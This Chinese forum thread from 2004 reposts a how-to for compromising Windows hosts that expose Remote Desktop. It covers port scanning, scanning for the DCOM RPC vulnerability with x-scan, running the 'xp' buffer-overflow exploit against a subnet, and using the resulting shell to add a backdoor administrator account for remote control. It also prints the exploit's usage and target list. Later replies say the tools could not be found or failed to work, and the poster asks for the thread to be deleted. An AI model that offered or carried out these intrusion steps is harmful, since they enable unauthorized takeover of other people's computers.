|
![]() | 作者: dfwm2008 [dfwm2008]
![]() |
登录 |
记得从前看过一篇文章介绍如何快速获得3389肉机的文章,基本思路及步骤如下: 先通过superscan等扫描端口的工具扫一段开启3389端口的主机,然后导出主机列表,再由x-scan扫描NT弱口令,配置强一点的字典,稍等一会儿,得到偌多弱口令,祭起终端连接,成功连接填入用户名就可以远程登陆控制了。留后门,删日志…… 其实得到开启3389服务的主机列表后,我们完全可以利用当前危害最大的“dcomrpc漏洞”添加一个管理员帐号,再用这个帐号轻松地登陆到远程终端,达到图形化的完全控制。 用到的工具有:superscan、x-scanV2.3、还有一个新增的x-scan的插件DComRpc.xpn,专门用来扫描存在DComRpc漏洞的机器。可以去下载,把它放到x-scan下plugin目录下。x-scan便有了扫描DComRpc漏洞的功能。当然你也可以下载专用的扫描器。不过经本人测试,这个插件还是相当好用的。还有主角远程 DCOM RPC 缓冲区溢出工具(可下载) 要开工了。用superscan得到主机列表,save成文本文件修改为一行一个IP的格式,这个过程略过不说了。打开加入了插件的x-scan,扫描参数中选“从文件获取主机列表”,选取刚才保存的文件。在扫描模块中只选择最后一项,也就是刚加进去的插件,Dcomrpc溢出漏洞。开始扫描吧,你会发现几乎是所有的机器都存在这个好玩而简单的漏洞。现在该用xpdcomrpc了,先看一下帮助吧: --------------------------------------------------------- - 远程 DCOM RPC 缓冲区溢出 - Original code by FlashSky and Benjurry - Rewritten by HDM <hdm [at] metasploit.com> - EXE 文件编译及修改:sagi http://www.hackerxfiles.net - Usage: xp <Target ID> <Target IP> - Targets: - 0 Windows 2000 SP0 (english) - 1 Windows 2000 SP0 (english2) - 2 Windows 2000 SP1 (english) - 3 Windows 2000 SP2 (english) - 4 Windows 2000 SP2 (english2) - 5 Windows 2000 SP3 (english) - 6 Windows 2000 SP3 (english2) - 7 Windows 2000 SP3 (english3) - 8 Windows 2000 SP4 (english) - 9 Windows XP SP0 (english) - 10 Windows XP SP1 (english) - 11 Windows XP SP1 (english2) - 12 Windows XP SP2 (english) - 13 Windows 2000 SP3 (chinese) - 14 Windows 2000 SP4 (chinese) - 15 Windows XP SP0 (chinese) - 16 Windows XP SP1 (chinese) - 17 Windows 2000 SP0 (japanese) - 18 Windows 2000 SP1 (japanese) - 19 Windows 2000 SP2 (japanese) - 20 Windows 2000 SP0-1 (big5) - 21 Windows 2000 SP3 (big5) - 22 Windows 2000 SP4 (big5) - 23 Windows XP SP0-1 (big5) - 24 Windows 2000 SP0 (korean) - 25 Windows 2000 SP1 (korean) - 26 Windows 2000 SP2 (korean) - 27 Windows 2000 SP4 (korean) 明白了吗?现在我们就可以这样了: xp 13 192.168.1.* 一段提示过后,看到跳出的shell了吗? c:\winnt\system32> 呵呵,到这一步,一切都好做了 c:\winnt\system32>net user admin hahaha /add 命令成功完成 c:\winnt\system32>net localgroup administrators admin /add 命令成功完成 好了,现在就可以用这个帐号admin进行3389远程控制了。 这种方法比较简单吧,要比起破解nt弱口令要主动一些,在此也是提出一种思路吧。从一开始的输入法漏洞开始,3389注定不能平安,愿大家都找到自己好用的肉机吧~. 大家可测试 看否搜寻所要的肉机 希望还能用 |
地主 发表时间: 04-01-12 15:04 |
![]() | 回复: lhh2003 [lhh2003] ![]() |
登录 |
晕,那我想请问xp.exe哪里有下载啊?从来也没有听说过!!! rpc漏洞不是要135端口,再通过cndcom溢出的啊,不过我试了都不可以的溢出的(chdcom同理) 唉。。。我都试了好久,网上说有70%都可以的,都不可以的. |
B1层 发表时间: 04-01-12 15:36 |
![]() | 回复: dfwm2008 [dfwm2008] ![]() |
登录 |
看来要删贴 我还没去试过 只是看到好的转过来给大家看一下而已 我忙 不好意思了各位 |
B2层 发表时间: 04-01-12 16:10 |
![]() | 回复: yunlaihao [yunlaihao] ![]() |
登录 |
请教superscan需要什么配置! 我的 机器不好想找个肉机但是superscan不能用! 怎么办啊 机器显示 连接文件superscan4.exe 找不存在的出去ADVAPI32。DLL:LSACLOSE。 什么意思啊?! |
B3层 发表时间: 04-01-12 16:31 |
![]() | 回复: dfwm2008 [dfwm2008] ![]() |
登录 |
强烈建议删了我这贴 这贴里的很多东西我都找不到 至于SUOERCAN 它根本就连接不到 所以 删 . |
B4层 发表时间: 04-01-12 19:09 |
![]() | 回复: lhh2003 [lhh2003] ![]() |
登录 |
呵呵,有心,但还是顶了!!!,嘻嘻![]() |
B5层 发表时间: 04-01-12 19:17 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号